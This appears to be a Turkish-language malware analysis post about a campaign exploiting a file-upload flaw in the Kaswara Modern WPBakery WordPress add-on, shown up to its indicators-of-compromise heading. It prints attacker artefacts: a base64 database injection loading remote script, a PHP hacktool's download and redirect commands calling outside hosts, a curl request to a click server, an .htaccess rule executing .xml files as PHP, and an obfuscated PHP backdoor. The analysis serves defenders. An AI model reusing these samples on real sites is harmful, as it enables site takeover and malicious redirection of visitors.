Savunmasız Kaswara Modern WPBakery Sayfa Oluşturucu Eklentisi Eklentisi Vahşi Doğada Kullanılıyor

20 Nisan 2021'de WPScan'daki arkadaşlarımız Kaswara Modern WPBakery Sayfa Oluşturucu Eklentileri olarak da bilinen Kaswara Modern VC Eklentilerinde ciddi bir güvenlik açığı bildirdi. Artık Codecanyon/Envato'da mevcut değil, yani bu çalışıyorsa, bir alternatif seçmelisiniz.

Bu güvenlik açığı, kimliği doğrulanmamış kullanıcıların eklentinin simge dizinine (./wp-content/uploads/kaswara/icons) rastgele dosyalar yüklemesine olanak tanır. Bu, WPScan'daki arkadaşlarımızın raporlarında bizimle paylaştığı ilk Uzlaşma Göstergesi (IOC).

Bir web sitesine rastgele dosyalar yükleme yeteneği, kötü oyuncuya site üzerinde tam kontrol sağlar, bu da bu enfeksiyonun nihai yükünü tanımlamayı zorlaştırır; bu nedenle, şimdiye kadar bulduğumuz her şeyi size göstereceğiz (araştırmaya biraz kendimizi kaptırdık, bu yüzden okumak istemiyorsanız, IOC bölümüne atlamaktan çekinmeyin).

Veritabanı Enjeksiyonu, Sahte Android uygulamaları ve diğer arka kapılar

Bu saldırı ile kullanılan veritabanı enjeksiyon takibine dikkat çektiği için Sucuri'den arkadaşımız Denis Sinegubko'ya teşekkür ederiz.

Kötü oyuncular, rastgele bir kötü amaçlı Javascript kodu parçacığı eklemek için 'kaswara-customJS' seçeneğini günceller. İşte bulduğumuz bir örnek:

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

Bu base64 kodlu dize şu anlama gelir:

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

Ve genellikle bu tür bir komut dosyasında olduğu gibi, bir dizi başka Javascript kod parçacığını zincirleme yükleyecek ve son yük ya bir kötü amaçlı reklam ya da bir istismar kiti olacaktır. Bu, Wordfence'in burada bildirdiğine çok benzer.

Bu durumda, komut dosyası hxxp://double-clickd[.]com/ adresinde ölüyor ve herhangi bir kötü içerik yüklemiyor. 2020'nin başından beri bu siteyi çağıran şüpheli Javascript buldum ve insanlar zaten 2018'den beri siteyi engelliyor.

Siteye Yüklenen Sahte Uygulamalar

İncelediğimiz web sitelerinde bulunan 40 Android uygulaması, bu VirusTotal analizine göre en popüler Anti-Virüs satıcıları tarafından şans eseri tespit edilen AliPay, PayPal, Correos, DHL ve diğerleri gibi farklı uygulamaların sahte sürümleriydi.

Uygulamanın amacını kontrol etmedim, ancak talep ettiği izinler hakkında hızlı bir inceleme, bize neler yapabileceğine dair bir fikir verebilir:

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.İNTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

Ancak bu dosyalar Kaswara istismarı kullanılarak hemen yüklenmiyor. Sitenin güvenliği ihlal edildikten sonra, saldırganlar siteyi tam olarak kontrol etmek için önce diğer araçları yükleyecektir.

Yüklenmiş dosyalar

Bu güvenlik açığından etkilenen web sitelerinde bazı arka kapılar ve diğer kötü amaçlı yazılımlar da bulundu. Bu yazıda en popüler ve ilginç olanların hızlı bir analizini paylaşacağım. Ancak, önce en karmaşık olana odaklanmak istiyorum.

Yönlendirme ve Sahte uygulamalar

Güvenliği ihlal edilmiş birkaç sitede bulduğum sahte Uygulamalar, Kaswara güvenlik açığından yararlanılarak yüklenmedi. Bunlar, saldırganın bazı uzak kodlar yüklemesine (bir URL veya dize sağlayarak) ve kullanıcıyı kötü niyetli bir siteye yönlendirmesine olanak tanıyan çok işlevli bir hacktool kullanılarak siteye yükleniyor.

Dosya, bu dizenin varlığıyla kolayca tanımlanabilir: base64_decode('MTIz');error_reporting(0); işlev

İlginçtir ki, bunun dışındaki her şeyi rastgele seçer.

Kötü amaçlı yazılım tek bir satırdadır, bu da bu tür bir kod anomalisi arıyorsanız ilginç bir IOC'dir.

Anlamayı kolaylaştırmak için kodun çoğu bölümünün kodunu çözdüm, ilginç işlevleri yeniden adlandırdım ve kodu güzelleştirdim. Kötü amaçlı yazılım 6 farklı işlev içerir ve bunlardan 5'i $_GET['ts'] değişkenine iletilen değerlere dayanır. Bu belge için bulduğum birçok örnekten birini ele alalım: c.php .

/c.php?ts=kt

Bu hiçbir şey yapmaz ve siteyi 500 hatası döndürmeye zorlar (daha sonra kodda).

/c.php?ts=1

Bir kod doğrulaması gerçekleştirmek ve saldırgana bir OK mesajı göndermek için $q1a bayrak değerini true olarak değiştirir.

Bu durumda uzak site yanıt verir: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v=”Kod”&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

$_GET["p"] , 123'ün SHA1 sağlama toplamı olduğu sürece, $ $_GET["v"] içeriği tarafından sağlanan kodla sunucuya bir dosya yazar ( base64_decode('MTIz') ilk IOC'sini hatırlayın? bu sağlama toplamıdır).

/c.php?ts=tt

Sunucuya 5 MB "-" yazar, muhtemelen yükleme işlevinin sunucuda çalışıp çalışmayacağını test etmek için kullanılır.

/c.php?ts=dwm&h=HASH1,HASH2

Kötü amaçlı yazılım bu isteği aldığında, yüklenen dosyaların sunucuya başarıyla yazıp yazmadığını doğrulamak için bir test gerçekleştirir. MD5 karmaları bilinmelidir ve virgülle ayrılmış değerler olarak $_GET['h'] değişkenine gönderilir.

/c.php?ts=dw&h=hash&l=URLs_as_CSV

Bir dizi üçüncü taraf web sitesinden bir dosya indirir ve indirilen dosyanın md5'inin son 12 karakterinden sonra adlandırarak sunucuya kaydeder.

Bu, sunucuya sahte uygulamalar yüklemek için kullanılan işlevdir.

Kötü amaçlı dosyaları indirme isteğine bir örnek /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

Erişimi yeniden yönlendirme

kt seçeneği veya hiçbir seçenek seçilmediyse, kod, gerekli verilerle bir JSON blobu istenerek elde edilen yeniden yönlendirmeye ilerler. Ardından, başlık işlevini kullanarak ziyaretçiyi yeniden yönlendirmeye devam eder.

Yanıt şöyle: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

Gerekli parametrelerle bir cURL isteğini yürütme işlevi şudur: Süslü değil…

Ve bu cURL isteğine çevrilebilir:

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

Nihai URL, test edebildiğim kadarıyla rastgele, ancak popüler bir hizmet veya uygulama için sahte bir sayfa olma özelliğini paylaşıyor.

wp-content/uploads/kaswara/icons/16/javas.xml ve wp-content/uploads/kaswara/icons/16/.htaccess

Bir XML dosyası genellikle potansiyel bir tehdit olarak işaretlenmez, ancak bu durumda, web sunucusunun onu nasıl gördüğünü değiştiren özel olarak hazırlanmış bir .htaccess dosyamız var:

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

Aslında, Apache'ye xml, php veya pdf içeren herhangi bir javas, home veya menü dosyasını, buna göre işlenecek ve yürütülecek bir PHP dosyası olarak anlamasını söyler. Bu nedenle, bu .htaccess ile aynı dizin yapısında bulunan dosyalardan herhangi biri şüpheli olacaktır.

Javas.xml dosyası, siteye yüklenen diğer bazı kötü amaçlı dosyalarla aynıdır. Aradaki farkı buldum, bazılarının dosyanın sonunda bir veya iki boş satır olması, bu da geleneksel karma işlemini biraz daha zorlaştırıyor.

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

Kötü amaçlı kod, str_rot13 ve base64 kodlu dizeler kullanılarak gizlenir. Ayrıca dizeleri biraz daha gizlemek için onaltılık değerler ve matematik işlemleri kullanır. Bir POST isteğinin değerlerine dayalı bir işlev yaratacağından, nihai yük bilinmiyor. Ancak, oluşturmadan önce bir md5 kontrolüne dayandığından, yük her seferinde aynı görünüyor (c42ea979ed982c02632430e9e98a66d6, md5 karma değeridir).

Çözüm

Bu aktif bir kampanya olduğundan, bu gönderiyi yazarken, etkilenen sitelere giderek daha fazla farklı kötü amaçlı yazılım örneklerinin düştüğünü görüyoruz. Bazıları burada sahip olduklarımızın varyasyonlarıdır, diğerleri ise daha derin bir analiz için yeterince ilginçtir. Bu diğer örneklerden bazılarını keşfetmek için yakında gelecek olan bazı küçük gönderilere bakın.

Bu, uzantılarınızın en son güvenlik düzeltmeleriyle güncellenmesinin önemini gösterir; geliştiriciler düzeltmeleri zamanında yayınlamazlarsa veya bunlar WordPress.org deposundan (veya diğer pazarlardan) kaldırılırsa, buna daha güvenli bir alternatif bulmanızı şiddetle tavsiye ederiz.

Siteniz için kötü amaçlı yazılım ve güvenlik açığından endişe ediyorsanız, Jetpack'in güvenlik özelliklerine bakın. Jetpack Security, yedeklemeler, kötü amaçlı yazılım taraması ve spam koruması dahil, kullanımı kolay, kapsamlı WordPress site güvenliği sağlar.

Uzlaşma Göstergeleri

Tanımladığımız tüm IOC'lerin tam listesini burada bulabilirsiniz: